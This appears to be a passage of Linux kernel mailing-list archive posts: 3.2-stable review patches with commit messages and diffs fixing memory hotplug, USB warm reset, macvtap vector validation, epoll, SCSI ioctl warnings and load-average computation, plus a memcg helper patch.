+   hwspin_lock_unregister_single(base_id + i);
return ret;
 }
 EXPORT_SYMBOL_GPL(hwspin_lock_register);




[ 038/108] memory hotplug: fix invalid memory access caused by stale kswapd pointer

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jiang Liu 

commit d8adde17e5f858427504725218c56aef90e90fc7 upstream.

kswapd_stop() is called to destroy the kswapd work thread when all memory
of a NUMA node has been offlined.  But kswapd_stop() only terminates the
work thread without resetting NODE_DATA(nid)->kswapd to NULL.  The stale
pointer will prevent kswapd_run() from creating a new work thread when
adding memory to the memory-less NUMA node again.  Eventually the stale
pointer may cause invalid memory access.
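
The stale-pointer problem can be modelled in a few lines of userspace C. This is a sketch only: the struct and function names are hypothetical, and a flag stands in for the thread being alive.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct worker_sketch { bool alive; };

struct node_sketch {
	struct worker_sketch *kswapd;	/* NULL means "no worker thread" */
	struct worker_sketch slot;	/* storage for the worker itself */
};

/* Starts a worker unless the node already claims to have one. */
static int node_run(struct node_sketch *n)
{
	if (n->kswapd)
		return 0;	/* nothing to do, or so the pointer claims */
	n->slot.alive = true;
	n->kswapd = &n->slot;
	return 1;
}

/* Stops the worker; reset_pointer selects the fixed behaviour. */
static void node_stop(struct node_sketch *n, bool reset_pointer)
{
	if (n->kswapd) {
		n->kswapd->alive = false;
		if (reset_pointer)
			n->kswapd = NULL;
	}
}

/* Offline the node, online it again, report whether a live worker exists. */
static bool restart_works(bool reset_pointer)
{
	struct node_sketch n = { NULL, { false } };

	node_run(&n);
	node_stop(&n, reset_pointer);
	node_run(&n);
	return n.kswapd != NULL && n.kswapd->alive;
}
```

Without the reset, the second node_run() sees a non-NULL pointer and skips creating a worker, which mirrors the behaviour described for kswapd_run().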

An example stack dump is shown below. It was reproduced with 2.6.32, but the
latest kernel has the same issue.

  BUG: unable to handle kernel NULL pointer dereference at (null)
  IP: [] exit_creds+0x12/0x78
  PGD 0
  Oops:  [#1] SMP
  last sysfs file: /sys/devices/system/memory/memory391/state
  CPU 11
  Modules linked in: cpufreq_conservative cpufreq_userspace cpufreq_powersave 
acpi_cpufreq microcode fuse loop dm_mod tpm_tis rtc_cmos i2c_i801 rtc_core tpm 
serio_raw pcspkr sg tpm_bios igb i2c_core iTCO_wdt rtc_lib mptctl 
iTCO_vendor_support button dca bnx2 usbhid hid uhci_hcd ehci_hcd usbcore sd_mod 
crc_t10dif edd ext3 mbcache jbd fan ide_pci_generic ide_core ata_generic 
ata_piix libata thermal processor thermal_sys hwmon mptsas mptscsih mptbase 
scsi_transport_sas scsi_mod
  Pid: 7949, comm: sh Not tainted 2.6.32.12-qiuxishi-5-default #92 Tecal RH2285
  RIP: 0010:exit_creds+0x12/0x78
  RSP: 0018:8806044f1d78  EFLAGS: 00010202
  RAX:  RBX: 880604f22140 RCX: 00019502
  RDX:  RSI: 0202 RDI: 
  RBP: 880604f22150 R08:  R09: 81a4dc10
  R10: 32a0 R11: 880006202500 R12: 
  R13: 00c4 R14: 8000 R15: 0001
  FS:  7fbc03d066f0() GS:8800282e() knlGS:
  CS:  0010 DS:  ES:  CR0: 8005003b
  CR2:  CR3: 00060f029000 CR4: 06e0
  DR0:  DR1:  DR2: 
  DR3:  DR6: 0ff0 DR7: 0400
  Process sh (pid: 7949, threadinfo 8806044f, task 880603d7c600)
  Stack:
   880604f22140 8103aac5 880604f22140 8104d21e
   880006202500 8000 00c38000 810bd5b1
    880603d7c600 dd29 0003
  Call Trace:
__put_task_struct+0x5d/0x97
kthread_stop+0x50/0x58
offline_pages+0x324/0x3da
memory_block_change_state+0x179/0x1db
store_mem_state+0x9e/0xbb
sysfs_write_file+0xd0/0x107
vfs_write+0xad/0x169
sys_write+0x45/0x6e
system_call_fastpath+0x16/0x1b
  Code: ff 4d 00 0f 94 c0 84 c0 74 08 48 89 ef e8 1f fd ff ff 5b 5d 31 c0 41 5c 
c3 53 48 8b 87 20 06 00 00 48 89 fb 48 8b bf 18 06 00 00 <8b> 00 48 c7 83 18 06 
00 00 00 00 00 00 f0 ff 0f 0f 94 c0 84 c0
  RIP  exit_creds+0x12/0x78
   RSP 
  CR2: 

[a...@linux-foundation.org: add pglist_data.kswapd locking comments]
Signed-off-by: Xishi Qiu 
Signed-off-by: Jiang Liu 
Acked-by: KAMEZAWA Hiroyuki 
Acked-by: KOSAKI Motohiro 
Acked-by: Mel Gorman 
Acked-by: David Rientjes 
Reviewed-by: Minchan Kim 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 include/linux/mmzone.h |2 +-
 mm/vmscan.c|7 +--
 2 files changed, 6 insertions(+), 3 deletions(-)

diff --git a/include/linux/mmzone.h b/include/linux/mmzone.h
index 2427706..68c569f 100644
--- a/include/linux/mmzone.h
+++ b/include/linux/mmzone.h
@@ -694,7 +694,7 @@ typedef struct pglist_data {
 range, including holes */
int node_id;
wait_queue_head_t kswapd_wait;
-   struct task_struct *kswapd;
+   struct task_struct *kswapd; /* Protected by lock_memory_hotplug() */
int kswapd_max_order;
enum zone_type classzone_idx;
 } pg_data_t;
diff --git a/mm/vmscan.c b/mm/vmscan.c
index eeb3bc9..6615763 100644
--- a/mm/vmscan.c
+++ b/mm/vmscan.c
@@ -2955,14 +2955,17 @@ int kswapd_run(int nid)
 }
 
 /*
- * Called by memory hotplug when all memory in a node is offlined.
+ * Called by memory hotplug when all memory in a node is offlined.  Caller must
+ * hold lock_memory_hotplug().
  */
 void kswapd_stop(int nid)
 {
struct task_struct *kswapd = NODE_DATA(nid)->kswapd;
 
-   if (kswapd)
+   if (kswapd) {
kthread_stop(kswapd);
+   NODE_DATA(nid)->kswapd = NULL;
+   }
 }
 
 static int __init kswapd_init(void)




[ 026/108] usb: Add support for root hub port status CAS

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Stanislaw Ledwon 

commit 8bea2bd37df08aaa599aa361a9f8b836ba98e554 upstream.

The host controller port status register supports CAS (Cold Attach
Status) bit. This bit could be set when USB3.0 device is connected
when system is in Sx state. When the system wakes to S0 this port
status with CAS bit is reported and this port can't be used by any
device.

When CAS bit is set the port should be reset by warm reset. This
was not supported by xhci driver.

The issue was found when pendrive was connected to suspended
platform. The link state of "Compliance Mode" was reported together
with CAS bit. This link state was also not supported by xhci and
core/hub.c.

The CAS bit is defined only for xhci root hub port and it is
not supported on regular hubs. The link status is used to force
warm reset on port. Make the USB core issue a warm reset when the port
is in either the 'inactive' or 'compliance mode' state. Change the xHCI driver
to report 'compliance mode' when the CAS bit is set. This forces a warm reset
on the root hub port.
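
The two halves of the change can be sketched together. The link-state encodings below are given as assumptions for illustration, and the helper names are hypothetical rather than the kernel's.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Link-state field of a USB 3.0 port status word (assumed encodings). */
#define SKETCH_LINK_STATE_MASK	0x01e0
#define SKETCH_LS_U0		0x0000
#define SKETCH_LS_SS_INACTIVE	0x00c0
#define SKETCH_LS_COMP_MOD	0x0140

/* Core side: warm reset is needed in Inactive or Compliance Mode. */
static bool warm_reset_required(bool superspeed, uint16_t portstatus)
{
	uint16_t ls = portstatus & SKETCH_LINK_STATE_MASK;

	return superspeed &&
	       (ls == SKETCH_LS_SS_INACTIVE || ls == SKETCH_LS_COMP_MOD);
}

/*
 * Root hub side: when CAS is set, pretend to be in compliance mode
 * unless the port is already in compliance or the inactive state.
 */
static uint16_t report_link_state(uint16_t link_state, bool cas)
{
	if (cas && link_state != SKETCH_LS_COMP_MOD &&
	    link_state != SKETCH_LS_SS_INACTIVE)
		return SKETCH_LS_COMP_MOD;
	return link_state;
}
```

Because regular hubs have no CAS bit, reusing an existing link state lets the core trigger the warm reset without learning about a root-hub-only flag.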

This patch should be backported to stable kernels as old as 3.2, that
contain the commit 10d674a82e553cb8a1f41027bb3c3e309b3f6804 "USB: When
hot reset for USB3 fails, try warm reset."

Signed-off-by: Stanislaw Ledwon 
Signed-off-by: Sarah Sharp 
Acked-by: Andiry Xu 
Signed-off-by: Ben Hutchings 
---
 drivers/usb/core/hub.c  |   18 ++
 drivers/usb/host/xhci-hub.c |   44 +--
 drivers/usb/host/xhci.h |6 +-
 3 files changed, 53 insertions(+), 15 deletions(-)

diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
index 25a7422..8fb4849 100644
--- a/drivers/usb/core/hub.c
+++ b/drivers/usb/core/hub.c
@@ -2324,12 +2324,16 @@ static unsigned hub_is_wusb(struct usb_hub *hub)
 static int hub_port_reset(struct usb_hub *hub, int port1,
struct usb_device *udev, unsigned int delay, bool warm);
 
-/* Is a USB 3.0 port in the Inactive state? */
-static bool hub_port_inactive(struct usb_hub *hub, u16 portstatus)
+/* Is a USB 3.0 port in the Inactive or Complinance Mode state?
+ * Port worm reset is required to recover
+ */
+static bool hub_port_warm_reset_required(struct usb_hub *hub, u16 portstatus)
 {
return hub_is_superspeed(hub->hdev) &&
-   (portstatus & USB_PORT_STAT_LINK_STATE) ==
-   USB_SS_PORT_LS_SS_INACTIVE;
+   (((portstatus & USB_PORT_STAT_LINK_STATE) ==
+ USB_SS_PORT_LS_SS_INACTIVE) ||
+((portstatus & USB_PORT_STAT_LINK_STATE) ==
+ USB_SS_PORT_LS_COMP_MOD)) ;
 }
 
 static int hub_port_wait_reset(struct usb_hub *hub, int port1,
@@ -2365,7 +2369,7 @@ static int hub_port_wait_reset(struct usb_hub *hub, int port1,
 *
 * See https://bugzilla.kernel.org/show_bug.cgi?id=41752
 */
-   if (hub_port_inactive(hub, portstatus)) {
+   if (hub_port_warm_reset_required(hub, portstatus)) {
int ret;
 
if ((portchange & USB_PORT_STAT_C_CONNECTION))
@@ -4408,9 +4412,7 @@ static void hub_events(void)
/* Warm reset a USB3 protocol port if it's in
 * SS.Inactive state.
 */
-   if (hub_is_superspeed(hub->hdev) &&
-   (portstatus & USB_PORT_STAT_LINK_STATE)
-   == USB_SS_PORT_LS_SS_INACTIVE) {
+   if (hub_port_warm_reset_required(hub, portstatus)) {
dev_dbg(hub_dev, "warm reset port %d\n", i);
hub_port_reset(hub, i, NULL,
HUB_BH_RESET_TIME, true);
diff --git a/drivers/usb/host/xhci-hub.c b/drivers/usb/host/xhci-hub.c
index 2732ef6..7b01094 100644
--- a/drivers/usb/host/xhci-hub.c
+++ b/drivers/usb/host/xhci-hub.c
@@ -462,6 +462,42 @@ void xhci_test_and_clear_bit(struct xhci_hcd *xhci, __le32 __iomem **port_array,
}
 }
 
+/* Updates Link Status for super Speed port */
+static void xhci_hub_report_link_state(u32 *status, u32 status_reg)
+{
+   u32 pls = status_reg & PORT_PLS_MASK;
+
+   /* resume state is a xHCI internal state.
+* Do not report it to usb core.
+*/
+   if (pls == XDEV_RESUME)
+   return;
+
+   /* When the CAS bit is set then warm reset
+* should be performed on port
+*/
+   if (status_reg & PORT_CAS) {
+   /* The CAS bit can be set while the port is
+* in any link state.
+* Only roothubs have CAS bit, so we
+* pretend to be in compliance mode
+* unless we're already in compliance
+* or the inactive state.
+   

[ 020/108] macvtap: zerocopy: validate vectors before building skb

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jason Wang 

commit b92946e2919134ebe2a4083e4302236295ea2a73 upstream.

There are several reasons that the vectors need to be validated:

- Return error when caller provides vectors whose num is greater than
  UIO_MAXIOV.
- Linearize part of skb when userspace provides a vector count greater than
  MAX_SKB_FRAGS.
- Return error when userspace provides vectors whose total length may exceed
  MAX_SKB_FRAGS * PAGE_SIZE.
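
The first two checks can be sketched in userspace as below. The limits are deliberately tiny, hypothetical stand-ins for UIO_MAXIOV, MAX_SKB_FRAGS and GOODCOPY_LEN, and the struct and function names are made up for the example.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

#define SKETCH_MAXIOV		8	/* stand-in for UIO_MAXIOV */
#define SKETCH_MAX_FRAGS	4	/* stand-in for MAX_SKB_FRAGS */
#define SKETCH_GOODCOPY		128	/* stand-in for GOODCOPY_LEN */

struct vec_sketch { size_t len; };

static const struct vec_sketch sample_vecs[6] = {
	{ 100 }, { 200 }, { 300 }, { 400 }, { 500 }, { 600 }
};

/* Total length of the first n vectors. */
static size_t vecs_length(const struct vec_sketch *iv, size_t n)
{
	size_t i, total = 0;

	for (i = 0; i < n; i++)
		total += iv[i].len;
	return total;
}

/* Returns -EMSGSIZE, or the number of bytes to copy into the linear part. */
static long linear_copy_len(const struct vec_sketch *iv, size_t count,
			    size_t vnet_hdr_len, size_t hdr_len)
{
	size_t copylen = 0;

	if (count > SKETCH_MAXIOV)
		return -EMSGSIZE;

	/* Too many vectors for the frags: linearize the leading ones. */
	if (count > SKETCH_MAX_FRAGS) {
		copylen = vecs_length(iv, count - SKETCH_MAX_FRAGS);
		if (copylen < vnet_hdr_len)
			copylen = 0;
		else
			copylen -= vnet_hdr_len;
	}
	if (copylen < hdr_len)
		copylen = hdr_len;
	if (!copylen)
		copylen = SKETCH_GOODCOPY;
	return (long)copylen;
}
```

With six vectors and four frag slots, the first two vectors (300 bytes, minus a 10-byte header) are copied so that the remaining four fit in the frags.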

Signed-off-by: Jason Wang 
Signed-off-by: Michael S. Tsirkin 
Signed-off-by: Ben Hutchings 
---
 drivers/net/macvtap.c |   25 +
 1 file changed, 21 insertions(+), 4 deletions(-)

diff --git a/drivers/net/macvtap.c b/drivers/net/macvtap.c
index a4ff694..163559c 100644
--- a/drivers/net/macvtap.c
+++ b/drivers/net/macvtap.c
@@ -529,9 +529,10 @@ static int zerocopy_sg_from_iovec(struct sk_buff *skb, const struct iovec *from,
}
base = (unsigned long)from->iov_base + offset;
size = ((base & ~PAGE_MASK) + len + ~PAGE_MASK) >> PAGE_SHIFT;
+   if (i + size > MAX_SKB_FRAGS)
+   return -EMSGSIZE;
num_pages = get_user_pages_fast(base, size, 0, &page[i]);
-   if ((num_pages != size) ||
-   (num_pages > MAX_SKB_FRAGS - skb_shinfo(skb)->nr_frags)) {
+   if (num_pages != size) {
for (i = 0; i < num_pages; i++)
put_page(page[i]);
return -EFAULT;
@@ -651,7 +652,7 @@ static ssize_t macvtap_get_user(struct macvtap_queue *q, struct msghdr *m,
int err;
struct virtio_net_hdr vnet_hdr = { 0 };
int vnet_hdr_len = 0;
-   int copylen;
+   int copylen = 0;
bool zerocopy = false;
 
if (q->flags & IFF_VNET_HDR) {
@@ -680,15 +681,31 @@ static ssize_t macvtap_get_user(struct macvtap_queue *q, struct msghdr *m,
if (unlikely(len < ETH_HLEN))
goto err;
 
+   err = -EMSGSIZE;
+   if (unlikely(count > UIO_MAXIOV))
+   goto err;
+
if (m && m->msg_control && sock_flag(&q->sk, SOCK_ZEROCOPY))
zerocopy = true;
 
if (zerocopy) {
+   /* Userspace may produce vectors with count greater than
+* MAX_SKB_FRAGS, so we need to linearize parts of the skb
+* to let the rest of data to be fit in the frags.
+*/
+   if (count > MAX_SKB_FRAGS) {
+   copylen = iov_length(iv, count - MAX_SKB_FRAGS);
+   if (copylen < vnet_hdr_len)
+   copylen = 0;
+   else
+   copylen -= vnet_hdr_len;
+   }
/* There are 256 bytes to be copied in skb, so there is enough
 * room for skb expand head in case it is used.
 * The rest buffer is mapped from userspace.
 */
-   copylen = vnet_hdr.hdr_len;
+   if (copylen < vnet_hdr.hdr_len)
+   copylen = vnet_hdr.hdr_len;
if (!copylen)
copylen = GOODCOPY_LEN;
} else





[ 023/108] epoll: clear the tfile_check_list on -ELOOP

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jason Baron 

commit 13d518074a952d33d47c428419693f63389547e9 upstream.

An epoll_ctl(,EPOLL_CTL_ADD,,) operation can return '-ELOOP' to prevent
circular epoll dependencies from being created.  However, in that case we
do not properly clear the 'tfile_check_list'.  Thus, add a call to
clear_tfile_check_list() for the -ELOOP case.
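
A toy model of the cleanup, assuming the loop check queues every file it visits on a global list. A counter stands in for 'tfile_check_list', and all names are hypothetical.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

static int check_list_len;	/* stand-in for the length of the check list */

static void clear_check_list(void)
{
	check_list_len = 0;
}

/* Queues 'visited' files on the list and reports whether a cycle exists. */
static bool loop_check(int visited, bool cycle)
{
	check_list_len += visited;
	return cycle;
}

/* Models the EPOLL_CTL_ADD path for an epoll file descriptor target. */
static int ctl_add(int visited, bool cycle)
{
	if (loop_check(visited, cycle)) {
		clear_check_list();	/* the call the patch adds */
		return -ELOOP;
	}
	/* Success path: later checks consume the list, then clear it. */
	clear_check_list();
	return 0;
}
```

Without the added call, entries queued during a failed loop check would still be on the list when the next epoll_ctl() call starts.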

Signed-off-by: Jason Baron 
Reported-by: Yurij M. Plotnikov 
Cc: Nelson Elhage 
Cc: Davide Libenzi 
Tested-by: Alexandra N. Kossovsky 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 fs/eventpoll.c |4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/fs/eventpoll.c b/fs/eventpoll.c
index 739b098..c0b3c70 100644
--- a/fs/eventpoll.c
+++ b/fs/eventpoll.c
@@ -1663,8 +1663,10 @@ SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd,
if (op == EPOLL_CTL_ADD) {
if (is_file_epoll(tfile)) {
error = -ELOOP;
-   if (ep_loop_check(ep, tfile) != 0)
+   if (ep_loop_check(ep, tfile) != 0) {
+   clear_tfile_check_list();
goto error_tgt_fput;
+   }
} else
list_add(&tfile->f_tfile_llink, &tfile_check_list);
}




[PATCH v2] memcg: add mem_cgroup_from_css() helper

2012-07-22 Thread Wanpeng Li
Changelog v2:
* fix too many args to mem_cgroup_from_css() (spotted by Kirill A. Shutemov)
* fix kernel build failed (spotted by Fengguang)

Add a mem_cgroup_from_css() helper to replace open-coded invocations of
container_of().  This clarifies the code and adds a little more type safety.
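
The pattern can be tried outside the kernel with a simplified container_of(). The macro below omits the kernel version's type checking, and the struct names are hypothetical stand-ins.

```c
#include <assert.h>
#include <stddef.h>

/* Simplified container_of(): pointer to member -> pointer to its container. */
#define container_of(ptr, type, member) \
	((type *)((char *)(ptr) - offsetof(type, member)))

struct css_sketch { int refcnt; };

struct memcg_sketch {
	long usage;
	struct css_sketch css;	/* embedded state, as in struct mem_cgroup */
};

/* Typed helper: only a struct css_sketch pointer is accepted. */
static inline struct memcg_sketch *memcg_from_css(struct css_sketch *s)
{
	return container_of(s, struct memcg_sketch, css);
}

static struct memcg_sketch sample = { 42, { 1 } };
```

The type safety comes from the function signature: passing any other pointer type to the helper draws a compiler diagnostic, whereas this simplified macro would accept it silently.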

Acked-by: Michal Hocko 
Signed-off-by: Wanpeng Li 

---
 mm/memcontrol.c |   19 +++
 1 files changed, 11 insertions(+), 8 deletions(-)

diff --git a/mm/memcontrol.c b/mm/memcontrol.c
index 883283d..f0c7639 100644
--- a/mm/memcontrol.c
+++ b/mm/memcontrol.c
@@ -407,6 +407,12 @@ enum charge_type {
 static void mem_cgroup_get(struct mem_cgroup *memcg);
 static void mem_cgroup_put(struct mem_cgroup *memcg);
 
+static inline 
+struct mem_cgroup *mem_cgroup_from_css(struct cgroup_subsys_state *s)
+{
+   return container_of(s, struct mem_cgroup, css);
+}
+
 /* Writing them here to avoid exposing memcg's inner layout */
 #ifdef CONFIG_CGROUP_MEM_RES_CTLR_KMEM
 #include 
@@ -864,9 +870,8 @@ static void memcg_check_events(struct mem_cgroup *memcg, struct page *page)
 
 struct mem_cgroup *mem_cgroup_from_cont(struct cgroup *cont)
 {
-   return container_of(cgroup_subsys_state(cont,
-   mem_cgroup_subsys_id), struct mem_cgroup,
-   css);
+   return mem_cgroup_from_css(cgroup_subsys_state(cont,
+   mem_cgroup_subsys_id));
 }
 
 struct mem_cgroup *mem_cgroup_from_task(struct task_struct *p)
@@ -879,8 +884,7 @@ struct mem_cgroup *mem_cgroup_from_task(struct task_struct *p)
if (unlikely(!p))
return NULL;
 
-   return container_of(task_subsys_state(p, mem_cgroup_subsys_id),
-   struct mem_cgroup, css);
+   return mem_cgroup_from_css(task_subsys_state(p, mem_cgroup_subsys_id));
 }
 
 struct mem_cgroup *try_get_mem_cgroup_from_mm(struct mm_struct *mm)
@@ -966,8 +970,7 @@ struct mem_cgroup *mem_cgroup_iter(struct mem_cgroup *root,
css = css_get_next(&mem_cgroup_subsys, id + 1, &root->css, &id);
if (css) {
if (css == &root->css || css_tryget(css))
-   memcg = container_of(css,
-struct mem_cgroup, css);
+   memcg = mem_cgroup_from_css(css);
} else
id = 0;
rcu_read_unlock();
@@ -2429,7 +2432,7 @@ static struct mem_cgroup *mem_cgroup_lookup(unsigned short id)
css = css_lookup(&mem_cgroup_subsys, id);
if (!css)
return NULL;
-   return container_of(css, struct mem_cgroup, css);
+   return mem_cgroup_from_css(css);
 }
 
 struct mem_cgroup *try_get_mem_cgroup_from_page(struct page *page)
-- 
1.7.7.6



[ 022/108] scsi: Silence unnecessary warnings about ioctl to partition

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jan Kara 

commit 6d9359280753d2955f86d6411047516a9431eb51 upstream.

Sometimes, warnings about ioctls to partitions happen often enough that they
form the majority of the warnings in the kernel log and users complain. In some
cases the warnings are about ioctls such as SG_IO, so it's not good to get rid
of the warnings completely, as they can ease debugging of userspace problems
when an ioctl is refused.

Since I have seen warnings from lots of commands, including some proprietary
userspace applications, I don't think disallowing the ioctls for processes
with CAP_SYS_RAWIO will happen in the near future, if ever. So let's just
stop warning for processes with CAP_SYS_RAWIO, for which the ioctl is allowed.
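
The reordering can be sketched as follows, with a counter standing in for the rate-limited printk and a boolean for the capability check. The function names are hypothetical.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

static int warnings;	/* number of warnings that would be logged */

/* Before: warn first, then let privileged callers through anyway. */
static int verify_old(bool has_rawio)
{
	warnings++;
	return has_rawio ? 0 : -ENOTTY;
}

/* After: privileged callers return early and never reach the warning. */
static int verify_new(bool has_rawio)
{
	if (has_rawio)
		return 0;
	warnings++;
	return -ENOTTY;
}
```

The return values are unchanged; only the case where the ioctl is allowed stops producing log output.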

CC: Paolo Bonzini 
CC: James Bottomley 
CC: linux-s...@vger.kernel.org
Acked-by: Paolo Bonzini 
Signed-off-by: Jan Kara 
Signed-off-by: Jens Axboe 
[bwh: Backported to 3.2: use ENOTTY, not ENOIOCTLCMD]
Signed-off-by: Ben Hutchings 
---
 block/scsi_ioctl.c |5 -
 1 file changed, 4 insertions(+), 1 deletion(-)

--- a/block/scsi_ioctl.c
+++ b/block/scsi_ioctl.c
@@ -721,11 +721,14 @@ int scsi_verify_blk_ioctl(struct block_device *bd, unsigned int cmd)
break;
}
 
+   if (capable(CAP_SYS_RAWIO))
+   return 0;
+
/* In particular, rule out all resets and host-specific ioctls.  */
printk_ratelimited(KERN_WARNING
   "%s: sending ioctl %x to a partition!\n", 
current->comm, cmd);
 
-   return capable(CAP_SYS_RAWIO) ? 0 : -ENOTTY;
+   return -ENOTTY;
 }
 EXPORT_SYMBOL(scsi_verify_blk_ioctl);
 





[ 028/108] sched/nohz: Rewrite and fix load-avg computation -- again

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Peter Zijlstra 

commit 5167e8d5417bf5c322a703d2927daec727ea40dd upstream.

Thanks to Charles Wang for spotting the defects in the current code:

 - If we go idle during the sample window -- after sampling, we get a
   negative bias because we can negate our own sample.

 - If we wake up during the sample window we get a positive bias
   because we push the sample to a known active period.

So rewrite the entire nohz load-avg muck once again, now adding
copious documentation to the code.
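
For orientation, the averaging step that consumes these samples is an exponentially decaying average in fixed point. The sketch below follows the usual a1 = a0 * e + a * (1 - e) form; FSHIFT and EXP_1 are the long-standing 1-minute constants, the function name is hypothetical, and 'active' is assumed to be already scaled by FIXED_1.

```c
#include <assert.h>

#define FSHIFT	11			/* bits of fractional precision */
#define FIXED_1	(1UL << FSHIFT)		/* 1.0 in fixed point */
#define EXP_1	1884UL			/* 1/exp(5sec/1min) in fixed point */

/* One decay step: new = old * exp + active * (1 - exp), rounded. */
static unsigned long calc_load_sketch(unsigned long load, unsigned long exp,
				      unsigned long active)
{
	load *= exp;
	load += active * (FIXED_1 - exp);
	load += 1UL << (FSHIFT - 1);	/* round to nearest */
	return load >> FSHIFT;
}
```

A sample that is biased low or high enters 'active' directly, so each bad sample shifts the average by roughly (1 - e) of the error, which is why the sampling window has to be handled carefully.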

Reported-and-tested-by: Doug Smythies 
Reported-and-tested-by: Charles Wang 
Signed-off-by: Peter Zijlstra 
Cc: Linus Torvalds 
Cc: Andrew Morton 
Link: http://lkml.kernel.org/r/1340373782.18025.74.camel@twins
[ minor edits ]
Signed-off-by: Ingo Molnar 
[bwh: Backported to 3.2: adjust filenames, context]
Signed-off-by: Ben Hutchings 
---
 include/linux/sched.h|8 ++
 kernel/sched/core.c  |  275 ++
 kernel/sched/idle_task.c |1 -
 kernel/sched/sched.h |2 -
 kernel/time/tick-sched.c |2 +
 5 files changed, 213 insertions(+), 75 deletions(-)

--- a/include/linux/sched.h
+++ b/include/linux/sched.h
@@ -1892,6 +1892,14 @@ static inline int set_cpus_allowed_ptr(s
 }
 #endif
 
+#ifdef CONFIG_NO_HZ
+void calc_load_enter_idle(void);
+void calc_load_exit_idle(void);
+#else
+static inline void calc_load_enter_idle(void) { }
+static inline void calc_load_exit_idle(void) { }
+#endif /* CONFIG_NO_HZ */
+
 #ifndef CONFIG_CPUMASK_OFFSTACK
 static inline int set_cpus_allowed(struct task_struct *p, cpumask_t new_mask)
 {
--- a/kernel/sched.c
+++ b/kernel/sched.c
@@ -1885,7 +1885,6 @@ static void double_rq_unlock(struct rq *
 
 #endif
 
-static void calc_load_account_idle(struct rq *this_rq);
 static void update_sysctl(void);
 static int get_update_sysctl_factor(void);
 static void update_cpu_load(struct rq *this_rq);
@@ -3401,11 +3400,73 @@ unsigned long this_cpu_load(void)
 }
 
 
+/*
+ * Global load-average calculations
+ *
+ * We take a distributed and async approach to calculating the global load-avg
+ * in order to minimize overhead.
+ *
+ * The global load average is an exponentially decaying average of nr_running +
+ * nr_uninterruptible.
+ *
+ * Once every LOAD_FREQ:
+ *
+ *   nr_active = 0;
+ *   for_each_possible_cpu(cpu)
+ * nr_active += cpu_of(cpu)->nr_running + cpu_of(cpu)->nr_uninterruptible;
+ *
+ *   avenrun[n] = avenrun[0] * exp_n + nr_active * (1 - exp_n)
+ *
+ * Due to a number of reasons the above turns in the mess below:
+ *
+ *  - for_each_possible_cpu() is prohibitively expensive on machines with
+ *serious number of cpus, therefore we need to take a distributed approach
+ *to calculating nr_active.
+ *
+ *\Sum_i x_i(t) = \Sum_i x_i(t) - x_i(t_0) | x_i(t_0) := 0
+ *  = \Sum_i { \Sum_j=1 x_i(t_j) - x_i(t_j-1) }
+ *
+ *So assuming nr_active := 0 when we start out -- true per definition, we
+ *can simply take per-cpu deltas and fold those into a global accumulate
+ *to obtain the same result. See calc_load_fold_active().
+ *
+ *Furthermore, in order to avoid synchronizing all per-cpu delta folding
+ *across the machine, we assume 10 ticks is sufficient time for every
+ *cpu to have completed this task.
+ *
+ *This places an upper-bound on the IRQ-off latency of the machine. Then
+ *again, being late doesn't loose the delta, just wrecks the sample.
+ *
+ *  - cpu_rq()->nr_uninterruptible isn't accurately tracked per-cpu because
+ *this would add another cross-cpu cacheline miss and atomic operation
+ *to the wakeup path. Instead we increment on whatever cpu the task ran
+ *when it went into uninterruptible state and decrement on whatever cpu
+ *did the wakeup. This means that only the sum of nr_uninterruptible over
+ *all cpus yields the correct result.
+ *
+ *  This covers the NO_HZ=n code, for extra head-aches, see the comment below.
+ */
+
 /* Variables and functions for calc_load */
 static atomic_long_t calc_load_tasks;
 static unsigned long calc_load_update;
 unsigned long avenrun[3];
-EXPORT_SYMBOL(avenrun);
+EXPORT_SYMBOL(avenrun); /* should be removed */
+
+/**
+ * get_avenrun - get the load average array
+ * @loads: pointer to dest load array
+ * @offset:offset to add
+ * @shift: shift count to shift the result left
+ *
+ * These values are estimates at best, so no need for locking.
+ */
+void get_avenrun(unsigned long *loads, unsigned long offset, int shift)
+{
+   loads[0] = (avenrun[0] + offset) << shift;
+   loads[1] = (avenrun[1] + offset) << shift;
+   loads[2] = (avenrun[2] + offset) << shift;
+}
 
 static long calc_load_fold_active(struct rq *this_rq)
 {
@@ -3422,6 +3483,9 @@ static long calc_load_fold_active(struct
return delta;
 }
 
+/*
+ * a1 = a0 * e + a * (1 - e)
+ */
 static unsigned long
 calc_load(unsigned

[ 037/108] PCI: EHCI: fix crash during suspend on ASUS computers

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Alan Stern 

commit dbf0e4c7257f8d684ec1a3c919853464293de66e upstream.

Quite a few ASUS computers experience a nasty problem, related to the
EHCI controllers, when going into system suspend.  It was observed
that the problem didn't occur if the controllers were not put into the
D3 power state before starting the suspend, and commit
151b61284776be2d6f02d48c23c3625678960b97 (USB: EHCI: fix crash during
suspend on ASUS computers) was created to do this.

It turned out this approach messed up other computers that didn't have
the problem -- it prevented USB wakeup from working.  Consequently
commit c2fb8a3fa25513de8fedb38509b1f15a5bbee47b (USB: add
NO_D3_DURING_SLEEP flag and revert 151b61284776be2) was merged; it
reverted the earlier commit and added a whitelist of known good board
names.

Now we know the actual cause of the problem.  Thanks to AceLan Kao for
tracking it down.

According to him, an engineer at ASUS explained that some of their
BIOSes contain a bug that was added in an attempt to work around a
problem in early versions of Windows.  When the computer goes into S3
suspend, the BIOS tries to verify that the EHCI controllers were first
